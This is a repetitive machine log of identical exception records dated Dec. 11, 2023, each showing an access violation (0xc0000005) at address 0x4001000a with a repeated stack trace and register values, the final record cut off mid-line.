__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x4001000a registers.r14: 1996279568 registers.r15: 0 registers.rcx: 5173936 registers.rsi: 0 registers.r10: 9769494 registers.rbx: 0 registers.rsp: 5175704 registers.r11: 5175552 registers.r8: 0 registers.r9: 0 registers.rdx: 224 registers.r12: 9694537 registers.rbp: 5175776 registers.rdi: 9768944 registers.rax: 1999833596 registers.r13: 6519584	1
__exception__ Dec. 11, 2023, 7:16 p.m.	stacktrace: 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a 0x4001000a exception.symbol: exception.exception_code: 0xc0000005 exception.address: 